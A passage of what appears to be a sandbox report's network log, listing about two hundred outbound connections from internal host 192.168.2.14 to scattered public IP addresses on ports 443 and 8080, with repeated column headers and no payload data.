                                      18983192.168.2.1450836175.56.56.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18984192.168.2.14351801.163.61.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18985192.168.2.1442028171.35.108.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18986192.168.2.1436142203.149.60.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18987192.168.2.1460240183.176.67.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18988192.168.2.1442812118.90.49.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18989192.168.2.145437850.8.6.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18990192.168.2.1453334202.237.99.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18991192.168.2.14505845.241.255.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18992192.168.2.1453626109.168.13.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18993192.168.2.1440862188.230.5.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18994192.168.2.1442320123.198.229.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18995192.168.2.1439288122.0.228.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18996192.168.2.1442938171.159.105.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18997192.168.2.1439878154.114.39.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18998192.168.2.145600485.93.21.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18999192.168.2.1447172179.53.79.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19000192.168.2.1452104141.64.52.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19001192.168.2.1437808147.3.189.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19002192.168.2.1443074173.105.81.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19003192.168.2.144647867.206.59.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19004192.168.2.143953266.194.91.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19005192.168.2.1455290210.176.218.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19006192.168.2.1448800126.90.27.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19007192.168.2.1438782100.236.191.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19008192.168.2.1436000132.118.95.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19009192.168.2.1438690177.105.150.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19010192.168.2.144918872.200.147.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19011192.168.2.144898053.240.21.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19012192.168.2.1453198128.173.19.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19013192.168.2.1435644205.177.126.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19014192.168.2.1439054140.81.127.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19015192.168.2.1455446175.130.8.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19016192.168.2.144057481.44.227.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19017192.168.2.1452966212.93.92.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19018192.168.2.145379090.79.166.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19019192.168.2.1459860121.233.73.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19020192.168.2.1457662188.187.20.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19021192.168.2.143800266.67.124.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19022192.168.2.1437206196.138.112.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19023192.168.2.1442754147.136.32.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19024192.168.2.1453406146.28.129.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19025192.168.2.1434550160.42.116.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19026192.168.2.1454876152.26.109.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19027192.168.2.1442312169.85.126.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19028192.168.2.1444794197.144.85.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19029192.168.2.14454902.32.54.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19030192.168.2.144465295.20.70.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19031192.168.2.1452504108.228.112.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19032192.168.2.1450178107.181.204.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19033192.168.2.1442332156.19.113.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19034192.168.2.1452986129.53.0.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19035192.168.2.1443968183.222.100.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19036192.168.2.143839282.221.47.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19037192.168.2.1456148189.177.7.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19038192.168.2.144339457.121.209.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19039192.168.2.1433004138.120.198.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19040192.168.2.1456614150.200.129.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19041192.168.2.144406877.228.63.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19042192.168.2.143771258.78.26.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19043192.168.2.1454010164.63.84.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19044192.168.2.144575651.91.102.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19045192.168.2.145267885.60.226.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19046192.168.2.1453190187.109.183.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19047192.168.2.1454484219.111.199.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19048192.168.2.145922813.4.111.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19049192.168.2.1449708219.200.80.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19050192.168.2.1452658218.13.142.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19051192.168.2.1459402185.178.226.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19052192.168.2.1442302133.180.113.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19053192.168.2.1458144165.163.253.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19054192.168.2.144050447.207.155.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19055192.168.2.1434986165.155.77.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19056192.168.2.1443778202.179.194.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19057192.168.2.146042036.154.152.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19058192.168.2.144553893.148.28.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19059192.168.2.1450970125.85.126.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19060192.168.2.1454992206.121.240.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19061192.168.2.1447184219.209.21.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19062192.168.2.1451596109.236.38.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19063192.168.2.144437459.101.23.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19064192.168.2.1436446118.194.18.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19065192.168.2.1433382154.77.170.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19066192.168.2.145608670.168.217.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19067192.168.2.144660076.211.173.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19068192.168.2.1443132222.85.99.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19069192.168.2.1443426185.32.147.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19070192.168.2.1440372199.94.23.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19071192.168.2.1434314133.232.202.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19072192.168.2.143949275.176.94.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19073192.168.2.1457804146.70.64.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19074192.168.2.1439982176.189.206.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19075192.168.2.144035847.128.249.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19076192.168.2.1441988114.142.70.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19077192.168.2.1434644138.39.161.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19078192.168.2.1456834157.146.117.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19079192.168.2.1443340202.79.181.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19080192.168.2.1459406201.94.35.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19081192.168.2.14377049.226.85.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19082192.168.2.145841220.21.236.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19083192.168.2.1440144132.65.214.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19084192.168.2.1433734110.72.30.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19085192.168.2.1455564119.138.182.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19086192.168.2.1446060187.116.53.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19087192.168.2.1460740115.29.119.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19088192.168.2.144622878.28.122.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19089192.168.2.1434420145.12.158.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19090192.168.2.1459562174.106.160.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19091192.168.2.144718824.211.200.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19092192.168.2.144022039.67.20.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19093192.168.2.1442230207.76.255.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19094192.168.2.1460784129.108.36.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19095192.168.2.1435212136.17.39.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19096192.168.2.1432772169.199.169.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19097192.168.2.144671097.217.66.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19098192.168.2.1433154111.4.231.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19099192.168.2.1449504162.223.8.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19100192.168.2.144856491.45.230.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19101192.168.2.144913014.72.153.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19102192.168.2.1436782152.240.223.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19103192.168.2.143395484.107.114.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19104192.168.2.14491002.243.74.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19105192.168.2.145998013.161.96.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19106192.168.2.1446376174.194.71.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19107192.168.2.143631039.18.79.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19108192.168.2.1451472110.235.48.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19109192.168.2.1440808218.231.138.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19110192.168.2.145578299.174.131.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19111192.168.2.144895883.59.79.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19112192.168.2.144209687.174.8.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19113192.168.2.1441968109.35.90.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19114192.168.2.1440980112.232.178.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19115192.168.2.1460394130.219.180.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19116192.168.2.1448324160.171.26.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19117192.168.2.1446068159.145.118.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19118192.168.2.1447778171.116.41.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19119192.168.2.1451386118.201.130.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19120192.168.2.1458764139.141.113.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19121192.168.2.1442046160.99.68.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19122192.168.2.1446744118.39.21.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19123192.168.2.143850273.76.38.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19124192.168.2.1448882218.159.220.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19125192.168.2.1443620167.194.8.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19126192.168.2.144491066.40.74.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19127192.168.2.1444898152.62.5.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19128192.168.2.1449000164.62.138.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19129192.168.2.145803279.214.165.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19130192.168.2.144378689.214.129.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19131192.168.2.143480666.46.145.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19132192.168.2.143708876.76.183.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19133192.168.2.143948839.187.108.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19134192.168.2.1445616219.49.193.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19135192.168.2.1435498222.212.201.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19136192.168.2.1454658151.234.119.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19137192.168.2.143590490.110.130.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19138192.168.2.146088824.100.177.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19139192.168.2.1445918223.46.70.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19140192.168.2.14345529.174.158.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19141192.168.2.145431814.37.133.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19142192.168.2.145848668.15.12.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19143192.168.2.1444470137.110.105.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19144192.168.2.1448646115.108.49.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19145192.168.2.14575824.23.193.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19146192.168.2.1448052220.213.15.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19147192.168.2.145290062.163.215.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19148192.168.2.144747623.8.224.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19149192.168.2.1441662114.36.190.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19150192.168.2.1448170171.50.29.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19151192.168.2.144418658.1.155.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19152192.168.2.1442036166.226.58.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19153192.168.2.1453602134.83.255.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19154192.168.2.1451050199.183.175.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19155192.168.2.1452378179.209.65.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19156192.168.2.1437916120.100.124.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19157192.168.2.143868020.156.34.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19158192.168.2.143947652.118.202.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19159192.168.2.143694649.99.37.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19160192.168.2.145811887.99.81.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19161192.168.2.1445126153.41.241.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19162192.168.2.1446988187.5.181.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19163192.168.2.1434660196.52.237.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19164192.168.2.144160434.120.239.2248080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19165192.168.2.1458790191.61.164.1358080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19166192.168.2.1440124177.20.6.148080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19167192.168.2.145656425.238.235.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19168192.168.2.144105840.33.135.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19169192.168.2.145762294.136.49.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19170192.168.2.1443412125.255.51.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19171192.168.2.1441706178.113.65.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19172192.168.2.1456304192.216.245.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19173192.168.2.1444846102.250.94.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19174192.168.2.1440032133.65.9.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19175192.168.2.1445232196.64.158.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19176192.168.2.1440706204.147.179.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19177192.168.2.1443016221.212.154.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19178192.168.2.144886640.95.112.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19179192.168.2.1442492210.183.173.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19180192.168.2.1449526148.206.1.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19181192.168.2.144458287.28.128.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19182192.168.2.145171677.116.42.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19183192.168.2.1437182106.180.40.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19184192.168.2.145371454.82.226.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19185192.168.2.1455072164.21.177.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19186192.168.2.1440180197.161.46.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19187192.168.2.14503081.184.69.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19188192.168.2.1444068200.236.168.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19189192.168.2.1454968208.33.77.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19190192.168.2.144899087.105.116.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19191192.168.2.1434826147.13.171.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19192192.168.2.1445514131.38.154.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19193192.168.2.1437968145.179.26.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19194192.168.2.1456476146.11.150.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19195192.168.2.1449798197.86.6.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19196192.168.2.1432896200.132.64.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19197192.168.2.1439076157.76.16.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19198192.168.2.1450890176.245.208.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19199192.168.2.1433944185.147.102.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19200192.168.2.145183469.176.206.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19201192.168.2.1442760132.149.49.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19202192.168.2.1453416210.34.179.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19203192.168.2.144179277.75.146.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19204192.168.2.1437386140.80.172.21443
                                      TimestampBytes transferredDirectionData


